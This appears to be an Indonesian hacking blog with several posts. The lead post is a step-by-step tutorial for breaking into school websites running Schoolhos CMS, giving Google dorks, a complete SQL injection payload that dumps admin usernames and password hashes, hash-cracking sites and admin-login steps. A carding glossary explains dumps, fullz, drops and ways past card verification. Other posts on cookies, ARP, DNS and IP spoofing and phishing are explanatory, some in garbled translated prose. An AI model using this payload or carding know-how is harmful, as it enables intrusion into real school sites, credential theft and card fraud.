Kevin Mitnick

12 tahun, Mitnick sudah melakukan aksi peretasan pertamanya dengan membobol sistem kartu bus berlangganan di Los Angeles.

Albert Einstain

Cobalah untuk tidak menjadi seorang yang SUKSES, Tapi jadilah seorang yang BERNILAI

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wednesday 31 August 2016

DEFACE CMS SCHOOL HOST SQLi

hallo para master , sebelumnya saya minta maaf kalo Post ini penuh kekurangan
CMS school host yang banyak digunakan website sch.id atau website sekolah ini memiliki bug yang cukup beresiko, simak tutorial berikut

Bahan

1. Dork


#  inurl:"/?p=info" site:id

#  inurl:"/?p=detberita"

#  inurl:"/?p=guru" site:id 
# inurl:/?p=bukutamu 
# intext:Schoolhos Free Open Source CMS
Kembangkan , jangan manja , gunakan otak kalian !
2. Sql Exploit
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
3. MD5 hash
www.md5online.org/
https://hashkiller.co.uk/
md5cracker.org/
www.md5hashgenerator.com/ 
Langkah Tutorial
1. Dorking di GOOGLE
cari terus , jangan malas
2. pilih target
3. masukan exploit
ex: www.target.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
4.kalo vuln maka akan seperti ini

disamping user ada angka angka Contoh admin30017008 hiraukan saja
5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit
6. login ke page admin nya : http://terget.domain/adminpanel
masukan user dan password 
selesai ..
mau tanam shell  ? tunggu post berikutnya
Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive
pengen tenar ? pengen di puji ? lo cari ilmu apa cari  muka ! kalo pengen tenar buat tool jangan merusak
gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah , ini hanya sekedar penmbelajaran untuk para newbie

Tuesday 30 August 2016

ISTILAH DALAM CARDING

Bukan untuk dipelajari, hanya untuk pengetahuan aja.

LR (Liberty Reserve)
Sistem pertukaran uang secara online yang hampir semuanya diterima untuk aktifitas carding.

WMZ (WebMoney)
Pembayaran online lainnya yang diterima

CC / CCV / CVV
Detail dari credit card, yaitu cardholder name(nama pemegang kartu), address (alamat), nomor kartu kredit, dan cvv2.

CVV2 / CSC / CVD / CVVC / CVC2 / SPC
Card Verification Value, Card Security Code, Card Verification Data, dll. Intinya ini adalah nomor yang ada dibelakang kartu untuk tujuan verifikasi. 3 digit untuk Mastercard, Visa, Discover. 4 digit untuk American Express (AMEX).

CVV1
Kode verifikasi pertama yang ditulis di magnetic stripe (Mag Stripe) dan dibaca ketika kartu dipakai manual (digesek).

DROP
Sebuah alamat yang dimana barang yang dipesan nanti dikirim.

CCN (Credit Card Number)
Jika diartikan ke bahasa Inggris, ini adalah nomor kartu kredit. Tapi dalam istilah ini, tidak hanya nomor kartu kredit saja, tapi juga masa aktif kartu (Expiration Month & Year)

DOB (Date of Birth)
Digunakan para carder biasanya untuk melewati ke langkah keamanan.

MMN (Mothers Maiden Name)
Sangat berguna ketika melewati langkah keamanan pada VBV, MCSC.

SSN (Social Security Number)
SSN itu jenis dari kartu identitas, sama seperti diatas untuk masuk ke langkah keamanan tambahan.

COB (Change of Billing)
Beberapa toko hanya mengirim barang jika billing address (alamat penagihan) sama seperti alamat pengiriman (shipping address).

FULLZ
Sama seperti CVV, tapi ditambah dengan info tambahan seperti "Security Question", SSN, DOB, MMN, dll.

AVS (Address Verification Service)
Sistem verifikasi kartu kredit yang mengecek apakah billing address yang diisi ke form sama dengan yang ada pada perusahaan penerbit kartu.

VBV (Verified by Visa)
Verifikasi tambahan biasanya berupa password, DOB, SSN, MMN,.

MCSC (Mastercard Secure Code)
Fitur yang sama seperti VBV tetapi ini untuk kartu jenis Mastercard.

Dump
Informasi yang ditulis ke magnetic stripe dibelakang kartu. Cara mendapatkannya yaitu hanya dengan skimmer. Contoh dump akan terlihat seperti ini 4131980030032319 = 11101010000000006460.

Skimmer
Sebuah alat yang ada dalam ATM untuk membaca kartu. Alat ini yang akan merekam informasi dalam kartu.

Embosser
Sebuah alat yang mencetak huruf timbul pada kartu.

Tipper
Alat yang mencetak warna Silver, Gold pada huruf yang dicetak tebal/timbul.

MSR (Magnetic Stripe Reader/Writer)
Alat yang digunakan menulis dump dan informasi lain pada kartu kosong.

BIN (Bank Identification Number)
6 digit pertama dalam kartu yang mengidentifikasikan bank, tipe kartu.

Novs (Novelty ID)
Kartu Identifikasi Baru, ID Palsu.

COOKIES Pengertian, Fungsi, Jenis

Pengertian cookies
Cookies atau bisa disebut sebagai HTTP cookies, web cookies, atau browser cookies adalah data/informasi yang diciptakan oleh suatu website untuk disimpan pada browser bisa diambil untuk memberitahu website tentang aktivitas user pada waktu sebelumnya.

Cookies diciptakan supaya website bisa mengetahui aktivitas yang telah dilakukan si user pada waktu sebelumnya. Aktivitas ini misalnya mengklik suatu tombol, login, atau halaman mana yang telah dibuka oleh user pada bulan bahkan tahun lalu.

Cookies juga bisa saja menyimpan informasi diri anda seperti nama, alamat e-mail, alamat rumah atau kantor, nomor telepon yang dapat digunakan untuk mengidentifikasi atau mengontak anda. Hal ini hanya bisa terjadi apabila anda memberikan informasi di dalam sebuah situs web.

Fungsi cookies
1. Membantu website untuk mengingat siapa kita dan mengatur preferences yang sesuai sehingga apabila user kembali mengunjungi website tersebut akan langsung dikenali.

2. Menghilangkan kebutuhan untuk meregister ulang di website tersebut saat mengakses lagi (site tertentu saja), cookies membantu proses login user ke dalam web server tersebut.

3. Memungkinkan website untuk menelusuri pola web surfing user dan mengetahui situs favorit yang sering dikunjunginya.
Jenis Cookies
  1. Non persistent (session) cookies. Suatu cookies yang akan hilang sewaktu user menutup browser dan biasanya digunakan pada  'shopping carts' di toko belanja online untuk menelusuri item-item yang dibeli,
  2. Persistent cookies. Diatur oleh situs-situs portal, banner / media iklan situs dan lainnya yang ingin tahu ketika user kembali mengunjungi site mereka. (misal dengan cara memberikan opsi ”Remember Me” saat login). File file ini tersimpan di hardisk user.
Kedua tipe cookies ini menyimpan informasi mengenai URL atau domain name dari situs yang dikunjungi user dan beberapa kode yang mengindikasikan halaman apa saja yang sudah dikunjungi. Cookies dapat berisi informasi pribadi user, seperti nama dan alamat email, Akan tetapi dapat juga user memberikan informasi ke website tersebut melalui proses registrasi. Dengan kata lain, cookies tidak akan dapat "mencuri" nama dan alamat email kecuali diberikan oleh user. Namun demikian, ada kode tertentu (malicious code) yang dibuat misalnya dengan ActiveX control, yang dapat mengambil informasi dari komputer tanpa sepengetahuan user.
Ukuran cookies umumnya kurang dari 100 bytes sehingga tidak akan mempengaruhi kecepatan browsing. tetapi karena umumnya browser diatur secara default untuk menerima cookies maka user tidak akan tahu bahwa cookies sudah ada di komputer. Cookies dapat berguna terutama pada situs yang memerlukan registrasi, sehingga setiap kali mengunjungi situs tersebut, cookies akan me-login-kan user tanpa harus memasukkan user name dan password lagi.

Kenapa Cookie Dibuat?

Mungkin kamu bertanya-tanya kenapa juga cookie dibuat? Alasannya karena cookie nyaman dan efektif saat digunakan. Jika website dengan pengunjung ribuan atau jutaan tidak menggunakan cookie, mereka akan menyimpan data interaksi yang dilakukan pengunjung ke server dan akan di proses disana. Tentu ini akan memakan waktu yang lama, sedangkan jika menggunakan cookie maka akan lebih cepat.


Kegunaan Cookie?


Salah satu alasan kegunaan cookie adalah untuk mengidentifikasi kamu. Mengidentifikasi, apa maksutnya ya? PG jelaskan secara sederhana, ketika kamu membuka sebuah wesite yang membutuhkan login dari akun kamu seperti Facebook, maka kamu harus mengisikan username dan password dan datanya akan tersimpan pada cookie. Saat kamu keluar dari browser dan membuka facebook lagi maka kamu akan berada di akun kamu, tidak perlu login lagi.


Berbahayakah Cookiee?

Cookie tidaklah berbahaya, cookie hanyalah metode yang digunakan untuk mempermudah seorang pengguna internet. Selain itu cookie juga tidak dapat terinfeksi oleh malware atau virus. Lalu apa yang perlu kamu takutkan pada cookie? Cerita terburuk untuk ini adalah ketika seseorang mencuri cookie kamu untuk membuat data palsu atau mendapatkan email dan password. Namun kamu jangan terlalu kawathir karena keamaan cookie tergantung dari website yang kamu kunjungi dan browser yang kamu gunakan. Karena biasanya cookie telah dienkripsi agar terlindungi dari serangan hacker.


Bagaimana Jika Cookie Terhapus?


Ini tidaklah masalah, menghapus cookie adalah salah satu hal terbaik untuk melindungi privasi kamu dari serangan hacker. Kalaupun kamu menghapus cookie, kamu hanya perlu login lagi ke akun Facebook yang biasanya sudah terbuka situs-situs lain yang biasanya langsung masuk ke akun kamu. Pada setiap browser cookie bisa dihapus dan letaknya berbeda-beda tergantung browser yang kamu gunakan. Berikut caranya:
  • Internet Explorer: Setting>Safety>Delete Browsing History
  • Firefox: Tools>Clear Recent History
  • Chrome: Setting>Tools>Clear browsing data
  • Opera: Opera>Setting>Delete Private Data
Kamu juga bisa menggunakan software seperti CCleaner, BleachBit, Eraser atau Privacy Agent.

MENGENAL BACKTRACK DAN SEJARAHNYA

  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
SEJARAH
 
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan sekuriti dari Israel dan Max Mosser. Jadi merupakan kolaborasi komunitas. Backtrack sendiri merupakan merger dari whax yang merupakan salah satu distro Linux yang digunakan untuk tes keamanan yang asal dari whax sendiri dari Knoppix.Ketika Knoppix mencapi versi 3.0 maka dinamakan dengan whax. Whax dapat digunakan untuk melakukan tes sekuriti dari berbagai jaringan di mana saja.Max Mosser merupakan auditor security collection yang mengkhususkan dirinya untuk melakukan penetrasi keamanan di Linux. Gabungan dari auditor dan Whax ini sendiri menghasilkan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix. 
 
Versi-versi yang telah di rilis 
 
Tanggal
Rilis
26 – 05 – 2006
backtrack pertama kali yang merupakan
versi non beta 1.0
13 – 10 – 2006
backtrack versi 2 beta pertama untuk
publik di rilis
19 – 11 – 2006
backtrack versi 2 beta kedua untuk
publik di rilis
06 – 03 - 2007
backtrack versi 2 final dirilis
17 – 12 – 2007
backtrack versi 3 beta pertama dirilis
19 – 03 - 2008
backtrack versi 3 final dirilis
11 – 01 - 2010
backtrack versi 4 final dirilis
10 – 05 - 2011
backtrack versi 5 final dirilis
www.indonesianbacktrack.or.id
18 – 08 - 2011
backtrack versi 5 R1 dirilis
 

Thursday 11 August 2016

Protocol ARP

Protocol ARP dalam jaringan internet adalah (Address Resolusion Protocol) yang berfungsi untuk memetakan IP address menjadi atau mengetahui Mac address dari user MAC (Media Access Control) , ARP bertugas untuk penghubung anatara datalink layer pada OSI layer ke Network layer yang ada IP protocol di network layer , dan semua komunikasi yang menggunakan TCP/IP akan menggunakan ARP untuk menentukan pemilik MAC yang sah dan dapat berhubungan dengan komputer lain , karna mac address di sini berkerja di layer awal yaitu Physical layer pengubung antara host satu dan lainya , semua data akan melalui membutuhkan MAC address untuk media komunikasinya antar host

Dan cara kerja ARP itu sendiri seperti pada gambaran berikut ini :
  • Host melakukan komunikasi data dengan suatu server , dan host tersebut mengetahui IP tujuan atau IP server tersebut sebagai tujuanya
  • Host menghubungi ARP unutuk memberikan atau membuatkan pesan sebagai permintaan ARP (Address Ressolusion Protocol) yang akan meminta alamat fisik atau meminta mac address dari server tujuan , sedangkan ARP yang dikirim tersebut berisi data lenggkap mengenai host yang meminta ARP untuk manampilkan data server tujuan seperti IP address peminta dan mac address (alamat fisik) peminta
  • Pesan data tersebut kemudian di kirim oleh network layer ke layer berikutnya yaitu data_link layer yang akan membungkus data tersebut menjadi frame , dan ftame tersebut berisi data permintaan dan data IP address dan alamt fisik user yang meminta alamat sebuah server
  • Kemudian paket ini akan di kirim kembali menggunakan multicas IGMP yang di gunakan untuk menyebarkan informasi tentang data yang di mintanya , semua host dan router yang ada di dalam jaringan akan menerima dan melihat paket tersebut dan membuangnya karna ID yang di minta dan data yang di minta tidak di miliki oleh user yang berkaitan dengan data yang di kirim tersebut , dan akan di teruskan di router yang berkaitan dengan jaringan luar
  • Kemudian router akan mengirim ke Broadcas multicass ke jaringan luar dan meminta data yang ada di dalam peket frame tersebut , kemudian akan menerima dari server yang di tuju dan server yang di tuju akan membuat hal yang sama dengan user yang ingin berhubungan dengan server tersebut
  • Dan dikirim kembali melalui proses yang sama dengan user yang meminta ARP untuk menghubungi server yang belum di ketahui agar bisa berkomunikasi

Di atas adalah cara kerja ARP , ketika ARP di kirim dengan Broadcass multicass attacker akan mengaku paham data yang akan di minta dan merubah paket yang berisi nama domain kompas.com di ganti dengan icydi.com baru attacker yang mengaku paham dan menjadi router akan mengirimkan ke router asli agar menampilkan icydi.com kepada user yang meminta data kompas dan detik

DNS Spofing

DNS Spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain.


DNS adalah sebuah service dalam jaringan TCP/IP yang dapat menerjemahkan IP address ke nama domain , tugas utama dari DNS adalah mempermudah seseorang untuk mengakses sebuah IP domain dengan nama yang mudah di ingat oleh manusia , contohnya manusia lebih mudah mengingat nama seperti www.facebook.com dari pada mengingat 101.2.44.251 (ip address)  

Fungsi dari DNS terurama memudahkan manusia untuk mengakses website dengan domain yang sudah di sediakan oleh server website tersebut , dan DNS spoofing ini akan meracuni protocol DNS agar user yang mengakses website www.facebook.com atau www.ngawur.co.id akan mengarah ke server lain dan menampilkan tampilan website lain 
 
Resiko dari kejadian atau tindakan DNS spoofing bisa sangat parah dan bisa biasa-biasa saja , contoh yang biasa-biasa saja , ketika seseorang membuka www.ngawur.co.id dan mengarah ke sbuah situs hanya untuk promusi atau sekedar iseng menampilkan nama atau indentitas dari seseorang agar orang tersebut dapat di kenal dan niatnya hanya buat pamer , akan tetapi DNS spoofing bisa menjadi masalah yang sangat serius ! Mengapa begitu ?

DNS spoofing akan menjadi sangat serius ketika seseorang mengakses website www.ngawur.co.id mengarah kesebuah server yang berisi virus , dan meracuni server sendiri dengan port 80 yang akan di akses oleh korban , dan ketika port 80 dari server tersebut di akses maka secara oromatis akan mengupload file virus ke system korban , dan virus tersebut dapat menjadi hal yang sangat bahaya , karna attacker bisa mengontrol system korban dengan cara memasukan trojan yang akan membuka port tersebut untuk di akses oleh attacker , 

Phishing

Pengertian

Phishing adalah suatu bentuk spesifik dari kejahatan cyber. Kriminal menciptakan replika hampir 100 persen sempurna dari sebuah situs web lembaga keuangan yang dipilih, kemudian mencoba untuk mengelabui pengguna dalam untuk mengungkapkan informasi pribadi mereka - username, password, PIN dll - melalui formulir di website palsu.
Phisher menggunakan berbagai teknik untuk mengelabui pengguna dalam mengakses situs web palsu, seperti mengirim email yang berpura-pura menjadi dari bank. Email ini sering menggunakan logo yang sah, gaya bisnis yang baik dan sering spoof header email agar terlihat seperti itu datang dari bank yang sah. Secara umum, surat-surat ini menginformasikan penerima bahwa bank telah berubah infrastruktur IT-nya dan meminta semua pelanggan untuk mengkonfirmasi ulang informasi pengguna mereka. Ketika penerima mengklik link dalam email, mereka diarahkan ke website palsu, dimana mereka akan diminta untuk membocorkan informasi pribadi mereka


Cara kerja Phising

Ketika kita tahu cara kerja phising maka akan lebih mudah untuk menghindarinya. Tahapan atau Cara kerja Phishing adalah sebagai berikut :

1. Dengan suatu cara si peretas membuat kita melakukan klik terhadap link situs palsu mereka, bisa dengan sebuah gambar menarik di media sosial , bujukan pada email dan lain sebagainya.

2. Setelah melakukan klik, kita akan di arahkan ke situs palsu yang mana pada situs tersebut terdapat form isian misalnya form login facebook dengan kata kata yang meyakinkan bahwa facebook kita telah logout dan meminta kita memasukkan username dan password kembali. kita yang tidak menyangka bahwa situs tersebut hanyalah tiruan akan mengisi saja username dan password tanpa curiga.

3. Apa yang kita masukkan ke form isian itu akan tersimpan di server si peretas. Jadi kita masih punya waktu untuk merubah password kita sebelum si peretas melihat username dan password kita di servernya.

4. Akun kita akan di ambil alih. peretas kemungkinan besar menggunakan akun kita untuk menyebarkan url psihing ke teman teman kita untuk mendapatkan korban yang lebih banyak.

Meretas password dengan metode phishing adalah yang paling mudah di praktikkan, itu sebabnya banyak sekali di dunia maya tersebar rujukan alamat alamat yang mengarahkan browser kita ke alamat web pishing atau web palsu.
Mahir membuat design blog sudah cukup untuk dapat melakukan praktik phising.
Dengan membuat situs tiruan yang tidak sama persis pun kita masih tetap bisa melakukan metode phising ini, asalkan dapat meyakinkan si target. seperti situs phishing coc dengan embel embel mendapatkan gems gratis, atau situs phising BBM yang mana pada kenyataannya situs tersebut tidak pernah ada sebelumnya. namun korbannya banyak.


Berikut Langkah untuk menghindari serangan PHISING atau SITUS PHISING :
 
1. Jangan pernah membalas email yang mencurigakan apalagi memasukkan sandi pada situs yang mencurigakan atau tidak anda percayai serta mengirimkan password dan data pribadi penting anda melalui email. Situs atau bisnis yang sah umumnya tidak akan meminta informasi melalui email.

2. Jika anda menerima permintaan informasi sensitif, buka jendela browser baru dan pergi kesitus organisasi dengan mengetik alamat website organisasi untuk meyakinkan bahwa anda sedang berhadapan dengan situs organisasi real dan bukan dengan website phiser. Jika ada sesuatu yang diperlukan dari anda, biasanya ada pemberitahuan disitus organisasi ini atau jika anda tidak yakin dengan permintaan ini sebaiknya menghubungi situs organisasi tersebut untuk bertanya.

3. Jangan pernah membuka situs yang mencurigakan atau tidak anda percayai. Periksa URL untuk memastikan halaman sebenarnya adalah  bagian dari situs organisasi dan bukan halaman penipuan pada domain yang berbeda seperti mybankk.com atau g00gle.com 

4. Berhati-hati terhadap tawaran yang fantastis yang tampaknya terlalu mudah untuk menjadi kenyataan, ini  mungkin PHISER.

5. Gunakan browser yang memiliki filter phising yang akan membantu anda mengetahui serangan phising potensial. Alamat situs yang aman dimulai dengan "https://" dan menampilkan icon Gembok terkunci diperamban anda.

Untuk mengatasi phising dan malware sebenarnya sangat mudah dan murah, kamu dapat melakukannya dengan menginstal beberapa aplikasi gratis yang disediakan vendor-vendor keamanan. Berikut beberapa aplikasi untuk mencegah terjadinya aktivitas phising dan malware:
1. Internet Explorer
2. Free Avira
3. Spybot Search & Destroy
4. McAfee SiteAdvisor
5 .Lavasoft Adaware 

Domain Seluruh Negara di Dunia

Berikut ini adalah Nama Domain Negara di Seluruh Dunia :

A

.ac – Ascension
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda
.ai – Anguilla
.al – Albania
.am – Armenia
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika
.at – Austria
.au – Australia
.aw – Aruba
.ax – Åland
.az – Azerbaijan

B

.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia
.br – Brasil
.bs – Bahama
.bt – Bhutan
.bv – Pulau Bouvet
.bw – Botswana
.by – Belarus
.bz – Belize

C

.ca – Kanada
.cc – Pulau Cocos
.cd – Republik Demokratik Kongo
.cf – Republik Afrika Tengah
.cg – Republik Kongo
.ch – Swiss
.ci – Côte d'Ivoire (Pantai Gading)
.ck – Kepulauan Cook
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal
.cy – Siprus
.cz – Republik Ceko

D

.de – Jerman
.dj – Djibouti
.dk – Denmark
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)

E

.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat
.er – Eritrea
.es – Spanyol
.et – Ethiopia
.eu – Uni Eropa

F

.fi – Finlandia
.fj – Fiji
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia
.fo – Kepulauan Faroe
.fr – Perancis

G

.ga – Gabon
.gb – Britania Raya
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana

H

.hk – Hong Kong
.hm – Pulau Heard dan Kepulauan McDonald
.hn – Honduras
.hr – Kroasia
.ht – Haiti
.hu – Hongaria

I

.id – Indonesia
.ie – Republik Irlandia
.il – Israel
.im – Pulau Man
.in – India
.io – Teritori Samudra Hindia Britania
.iq – Irak
.ir – Iran
.is – Islandia
.it – Italia

J

.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang

K

.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan

L

.la – Laos
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia
.ly – Libya

M

.ma – Maroko
.mc – Monako
.md – Moldova
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia
.mo – Makau
.mp – Kepulauan Mariana Utara
.mq – Martinique
.mr – Mauritania
.ms – Montserrat
.mt – Malta
.mu – Mauritius
.mv – Maladewa
.mw – Malawi
.mx – Meksiko
.my – Malaysia
.mz – Mozambik

N

.na – Namibia
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda
.no – Norwegia
.np – Nepal
.nr – Nauru
.nu – Niue
.nz – Selandia Baru

O

.om – Oman

P

.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina
.pk – Pakistan
.pl – Polandia
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn
.pr – Puerto Riko
.ps – Otoritas Nasional Palestina
.pt – Portugal
.pw – Palau
.py – Paraguay

Q

.qa – Qatar

R

.re – Réunion
.ro – Rumania
.rs – Serbia
.ru – Rusia
.rw – Rwanda

S

.sa – Arab Saudi
.sb – Kepulauan Solomon
.sc – Seychelles
.sd – Sudan
.se – Swedia
.sg – Singapura
.sh – Saint Helena
.si – Slovenia
.sj – Svalbard dan Jan Mayen
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino
.sn – Senegal
.so – Somalia
.sr – Suriname
.st – Sao Tome dan Principe
.su – Uni Soviet
.sv – El Salvador
.sy – Suriah
.sz – Swaziland

T

.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo
.th – Thailand
.tj – Tajikistan
.tk – Tokelau
.tl – Timor Leste
.tm – Turkmenistan
.tn – Tunisia
.to – Tonga
.tp – Timor Timur
.tr – Turki
.tt – Trinidad dan Tobago
.tv – Tuvalu
.tw – Republik Tiongkok (Taiwan)
.tz – Tanzania

U

.ua – Ukraina
.ug – Uganda
.uk – Inggris
.us – Amerika Serikat
.uy – Uruguay
.uz – Uzbekistan

V

.va – Vatikan
.vc – Saint Vincent dan Grenadines
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu

W

.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat)

Y

.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia

Z

.za – Afrika Selatan
.zm – Zambia
.zw – Zimbabwe

IP spoofing

Sejarah 
 
   
         Konsep dari spoofing IP, pada awalnya dibahas di kalangan akademik di tahun 1980-an. Sementara diketahui tentang untuk kadang-kadang, itu terutama teoritis sampai Robert Morris, yang putranya menulis Internet Worm pertama, menemukan kelemahan dari keamanan dalam protokol TCP yang dikenal dengan prediksi urutan. Stephen Bellovin masalah dibahas secara mendalam di Keamanan Permasalahan dalam TCP / IP Protocol Suite, sebuah makalah yang membahas masalah desain dengan protokol TCP / IP. Serangan terkenal, Kevin Mitnick Hari Natal retak mesin Tsutomu Shimomura’s, bekerja dengan teknik spoofing IP dan prediksi urutan TCP. Sementara popularitas retak seperti telah menurun karena runtuhnya layanan yang mereka dieksploitasi, spoofing masih dapat digunakan dan perlu ditangani oleh semua administrator keamanan.


Pengertian
 
 adalah serangan teknis yang rumit yant terdiri dari beberapa komponen. Ini adalah eksploitasi keamanan yang bekerja dengan menipu komputer dalam hubungan kepercayaan bahwa anda adalah orang lain. 
atau secara sederhana adalah salah satu tekhnik yang banyak digunakan di internet untuk menyembunyikan atau memalsukan source IP address sehingga asal dari paket network tidak bisa terlacak ataupun untuk mengelabui komputer tujuan.
Terdapat banyak makalah ditulis oleh daemon9, route, dan infinity di Volume Seven, Issue Fourty-Eight majalah Phrack.  

Konsep dari spoofing ditemukan karena kelemahan pada stack TCP/IP yang pertama kali diperkenalkan oleh Steven Bellovin pada papernya tahun 1989 “Security Problem in the TCP/IP Protocol Suite” dimana penyerang mengirimkan pesan ke suatu komputer dengan alamat IP yang menunjukkan bahwa pesan dikirim melalui port komputer yang aman, padahal sebenarnya pesan tersebut dikirim dari komputer penyerang yang telah memalsukan IP yang dituju oleh korban.
Tidak seperti IP, TCP menggunakan connection-oriented design. Artinya dua komputer yang ingin terhubung dengan TCP harus membuat koneksi terlebih dahulu melalui tiga cara handshake (SYN-SYN/ACK-ACK) – lalu mengupdate progress masing masing melalui sederetan acknowledgements. Seperti yang kita ketahui untuk mengganti source address dengan memanipulasi header IP. Teknik ini digunakan untuk memanipulasi alamat pengirim yang merupakan bagian terpenting dari IP spoofing. Sementara pada TCP kita dapat memprediksikan sequence number yang dapat di gunakan untuk melakukan session hijacking atau mengexploitasi host. 
 Analogi ip spoofing adalah sebagai berikut:

 Bayangkan anda ingin mengirimkan surat ancaman kepada seseorang, dan tentunya anda tidak ingin orang yang anda ancam mengetahui bahwa surat ancaman itu berasal dari anda. Jadi yang anda lakukan adalah mengirimkan surat tersebut dengan menggunakan nama dan alamat orang lain sehingga anda akan aman dan tidak terlacak.

 Ada 2 tujuan kurang baik yang biasa diasosiasikan dengan penggunaan IP spoofing:
  1. Mengirimkan paket sampah dalam jumlah besar agar komputer tujuan mengalami overload. Bayangkan ada orang yang mengirimkan surat kaleng dalam jumlah ratusan bahkan ribuan tentunya hal ini akan membuat anda marah sehingga mungkin anda akan membuang semua surat anda, padahal diantara tumpukan surat-surat sampah itu ada beberapa surat penting. 
  2. Mengelabui komputer tujuan sehingga ia akan mengira bahwa paket yang dikirim berasal dari komputer yang bisa dipercaya. Bayangkan anda menerima surat dari kelurahan dan berlogo pemerintah Jakarta, berisi pemberitahuan mengenai peraturan baru bahwa akan ada pungutan biaya untuk penyemprotan nyamuk malaria sebesar 10 ribu. Tentunya apabila esok hari ada seseorang yang datang menagih, ada tidak akan curiga dan memberikan uang tersebut, padahal orang tersebut adalah petugas gadungan yang sudah mengirimkan surat palsu sehari sebelumnya.
Variasi serangan IP spoofing
Ada beberapa variasi pada jenis serangan yang berhasil menggunakan IP spoofing yaitu :
1.      Non-Blind Spoofing
Tipe serangan ini biasanya terjadi jika korban berada dalam satu subnet jaringan yang sama.
2.      Blind Spoofing
Pada Blind Spoofing serangan yang dilakukan akan lebih sulit untuk dilaksanakan karena angka sequence dan acknowledgement tidak dapat di snifing karena tidak dalam satu subnet.
3.      Man In the Middle Attack (Manusia Dalam Serangan Tengah)
Pada tipe serangan ini sebuah komputer memotong jalur komunikasi dari dua komputer yang terhubung, kemudian mengontrol alur komunikasi dan dapat menghapus danmembuat informasi yang di kirim dari salah satu komputer yang terhubung tadi tanpa diketahui oleh keduanya.
4.      Denial of Service Attack
Ip spoofing sering kali di gunakan untuk melakukan denial of service, atau DoS. Dalam hal ini kita hanya ingin menghabiskan bandwidth dan resource, tidak memikirkan tentang penyelesaian handshakes dan transaksi yang di lakukan.

Kasus Spoofing attack pada akun GMail
